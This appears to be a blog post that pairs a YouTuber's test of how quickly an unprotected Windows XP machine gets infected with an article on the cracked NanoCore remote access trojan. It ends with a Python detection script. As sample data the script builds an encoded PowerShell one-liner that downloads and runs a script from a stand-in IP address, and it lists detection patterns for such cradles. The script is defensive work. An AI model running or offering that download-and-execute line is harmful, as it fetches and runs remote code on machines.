
Legacy Windows OSes Fall Prey to Rapid Online Attacks

Windows XP was officially retired in 2014, ending a run of more than a decade on our desktops. The beloved OS was given one last security update in 2019, but for all intents and purposes it is dead. Nevertheless, some organisations still run it, including the US State Department, according to the federal Government Accountability Office (GAO).

With that in mind, a curious YouTuber set out to check how quickly a computer running it would get infected once connected to the internet. The answer turned out to be about 10 minutes. In a recent video, YouTuber Eric Parker demonstrated the danger of connecting classic Windows operating systems to the internet in 2024 with no protective layer at all: no host firewall, and no router sitting between the machine and the internet to keep unsolicited inbound connections away from it.

He set up a Windows XP virtual machine with a completely unsecured internet connection and saw several pieces of malware attacking the OS almost immediately. Putting a PC on the internet with no protection at all might seem silly today, but in the early 2000s a PC connected directly to the internet without a router was very common.

Windows XP did ship with a built-in firewall (enabled by default from Service Pack 2 onwards), and most people ran anti-virus software as well. Even so, it was much easier to end up running a PC entirely unprotected, intentionally or accidentally, than it is on newer operating systems. On top of that, running Windows XP unprotected in 2024 is even more dangerous, since the operating system no longer receives security updates, so every publicly known flaw in its network-facing services stays exploitable indefinitely.

The first piece of malware Eric Parker found on his Windows XP virtual machine, about two minutes after connecting it to the internet, was a file called "conhoz.exe" that installed itself without any interaction on his part; it appeared to be the same sample he had seen on the desktop machine. Another intrusion followed soon after, creating an entirely new Windows XP account called "admin" and starting an FTP server on the machine.

Several hours after he first started the experiment, he returned to it and found that yet another user, named "Admina", had been added to the machine without him touching anything at all. Logging into the regular account, he noticed a process named ftp.exe running, which did not look promising. Examining the files in Process Explorer showed that conhoz.exe had been created by a program whose description read "Microsoft Compilation". It was a wild ride: various malicious components were traced back to IP addresses in Russia (naturally), with more appearing as time went on.

In the latter half of the video Eric Parker installs a legacy version of Malwarebytes, and an initial scan finds eight different pieces of malware, discussed below. One change the malware had made was to the system's DNS settings, pointing name resolution at a virtual private server hosted by the Chinese cloud provider Alibaba, which lets whoever controls that server see and manipulate every name lookup the machine makes. That is never a good sign.

By the time the video ends, the malware has won: an outdated anti-virus program, unable to deal with the various threats, is left to pick through the aftermath. Eric Parker notes that a Windows 7 virtual machine left on the same open network setup for several hours showed no issues and no evidence of malware. To identify the suspect files with their Russian fingerprints, he downloaded Malwarebytes and ran a scan against them.

A quick scan of the system revealed eight threats: four trojans, two backdoors, and two instances of adware. After looking up some of the malware in a browser, as PCGamer reported, he concluded that the machine was most likely being used as part of a botnet and to harvest personal information from its users. Malwarebytes had not flagged conhoz.exe itself when he clicked the quarantine button, but once the eight threats were quarantined and the system rebooted, conhoz.exe no longer started automatically at boot.

The file remained in the Windows\Temp folder, suggesting that only its launcher had been neutralised. That reprieve did not last: after a few minutes, the program was running again. Malwarebytes was run a second time to hunt for illicit services, at which point it abruptly shut down and disappeared. Task Manager showed conhoz.exe once again running in the background. Mr Parker described this as a "victory for the malware". These incidents exemplify the worst case for both the Windows XP and Windows 2000 operating systems.

Without basic protections in place, attackers can use tools such as Nmap to fingerprint the exact operating system version running on an exposed host. Once they know it is an unpatched legacy system, they can exploit its network-facing services to drop and execute malware directly on it. Modern operating systems do not expose themselves this way: Windows 10 and Windows 11, for instance, ship with significantly more robust defaults that make it far harder for malware to install itself, even with the firewall disabled.

Eric Parker confirmed that Microsoft operating systems from Windows 7 onwards did not fall to the attacks demonstrated above. He ran Windows 7 for several hours without antivirus software or a firewall on another virtual machine and detected no malware on it. This shows how substantially security has improved in modern operating systems compared to their legacy counterparts.

Windows Users Beware of the “Complete Control” Hack Attack; Update Imperative!

Windows users are facing a recently resurrected Remote Access Trojan (RAT) that, once it lands on a system, hands the attacker complete control of it.

A cracked, modified build of the RAT is now circulating, and as it turns out it is absolutely free of cost.

The NanoCore RAT, as it is called, has been hovering around the dark web for quite some time now. It was initially sold for $25, a minimal amount for a hacking tool targeting Windows.

As soon as NanoCore's cracked version appeared, it caused quite a commotion among researchers and hackers alike.

Initially the "premium plugins" were paid-for privileges, but the latest cracked version has them all for free.

The NanoCore author was arrested as the product's popularity rose and his part in cybercrime became clear.
Despite that, NanoCore thrived and spawned other tool variants, including Surprise Ransomware, LuminosityLink and, of course, the free "highly modified" latest version.

According to researchers, the NanoCore RAT is guarded by only trivial security measures, has no particular barriers to entry and offers a really uncomplicated interface, which makes it usable even by novice hackers.

Campaigns using this very malware have surged; its capabilities include:
·       Remote shutdown and restart of Windows systems
·       Remote file browsing on the infected system
·       Access to and control of Task Manager, the mouse and the Registry editor
·       Disabling the webcam light in order to spy on the user
·       Taking over open web pages
·       Recovering passwords and obtaining credentials
·       A remotely operated "locker" that encrypts files

Because NanoCore has been around for so long, the techniques it uses are well known to researchers, who group them into three main categories: scripting, registry keys and malicious attachments.


The basic defence against the scripting threat is to check Microsoft Office files for macro code and to watch for "anomalous execution" of legitimate scripting programs such as PowerShell or WScript.

Registry keys used for persistence should be monitored, update and patch cycles kept current, and rigorous behavioural detection put in place.
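As an added example (not code from the original post, nor from the researchers it cites), the Python below applies those three checks to constructed, Sysmon-style key=value records: it flags an Office application spawning a script host, decodes a PowerShell -EncodedCommand payload before matching it for a download-and-execute cradle, flags an autostart Run-key value pointing at a user-writable path, and checks an OOXML container for a VBA project. The record format, the paths, the IP address and every sample value are hypothetical and built inline.

```python
"""Toy detection pass for the three NanoCore-style tradecraft categories named
above. Added example, not code from the original post or the cited research.
The log format below is a hypothetical Sysmon-like key="value" layout and all
sample values are constructed; nothing here is real telemetry."""
import base64
import io
import re
import zipfile
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Autostart keys commonly abused for persistence; the HKCU/HKU variants need no admin rights.
RUN_KEYS = ("\\microsoft\\windows\\currentversion\\run", "\\microsoft\\windows\\currentversion\\runonce")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
CRADLE = re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b|\biwr\b)")
ENCODED = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")


def parse_event(line):
    """'EventID="1" Image="C:\\x.exe"' -> {'EventID': '1', 'Image': 'C:\\x.exe'}"""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def image_name(path):
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(cmd):
    """Return the decoded -EncodedCommand payload (Base64 of UTF-16LE), or '' if absent/invalid."""
    m = ENCODED.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def check_event(ev):
    """Return a list of finding strings for one parsed event (empty if benign)."""
    findings = []
    if ev.get("EventID") == "1":  # process creation
        child = image_name(ev.get("Image", ""))
        parent = image_name(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            findings.append(f"office-spawned script host: {parent} -> {child}")
        if child in POWERSHELL:
            decoded = decode_encoded_command(cmd)
            if decoded:
                findings.append("powershell encoded command")
            if CRADLE.search(cmd) or CRADLE.search(decoded):
                findings.append("powershell download/execute cradle")
    elif ev.get("EventID") == "13":  # registry value set
        target = ev.get("TargetObject", "").lower()
        details = ev.get("Details", "").lower()
        if any(k in target for k in RUN_KEYS) and any(p in details for p in USER_WRITABLE):
            findings.append(f"run-key persistence to user-writable path: {ev.get('TargetObject')}")
    return findings


def scan_log(lines):
    """Return {1-based line number: findings} for every record that trips a rule."""
    hits = {}
    for n, line in enumerate(lines, 1):
        findings = check_event(parse_event(line))
        if findings:
            hits[n] = findings
    return hits


def office_file_has_macros(data):
    """True if an OOXML container (docx/docm/xlsm, ...) carries a VBA project part."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
    except zipfile.BadZipFile:
        return False


def make_office_file(with_macro):
    """Constructed minimal OOXML zip; real documents carry many more parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed stub")
    return buf.getvalue()


# Constructed attacker one-liner, encoded the way PowerShell expects (Base64 of UTF-16LE).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/nc.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

SAMPLE_LOG = [  # constructed records; line 2 and line 4 are the malicious ones
    'EventID="1" Image="C:\\Windows\\explorer.exe" ParentImage="C:\\Windows\\System32\\userinit.exe" CommandLine="explorer.exe"',
    'EventID="1" Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    f'CommandLine="powershell.exe -nop -w hidden -enc {ENC}"',
    'EventID="1" Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" ParentImage="C:\\Windows\\explorer.exe" CommandLine="powershell.exe Get-Process"',
    'EventID="13" TargetObject="HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater" Details="C:\\Users\\alice\\AppData\\Roaming\\svchost.exe"',
    'EventID="13" TargetObject="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SecurityHealth" Details="C:\\Program Files\\Windows Defender\\MSASCuiL.exe"',
]

if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {'; '.join(findings)}")
    print("macro document flagged:", office_file_has_macros(make_office_file(True)))
    print("plain document flagged:", office_file_has_macros(make_office_file(False)))
```

The encoded-command rule decodes before matching because the cradle strings never appear in the raw command line of an encoded launch; the Run-key rule deliberately ignores entries that point into Program Files, since that is where legitimate autostarts live, and only fires on locations an unprivileged user can write to.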

Windows users should update their systems immediately and make sure all of their applications are running the way they actually should.

Additionally, Windows 10, 8.1 and 7 users in particular should keep a keen eye on regular updates and patching.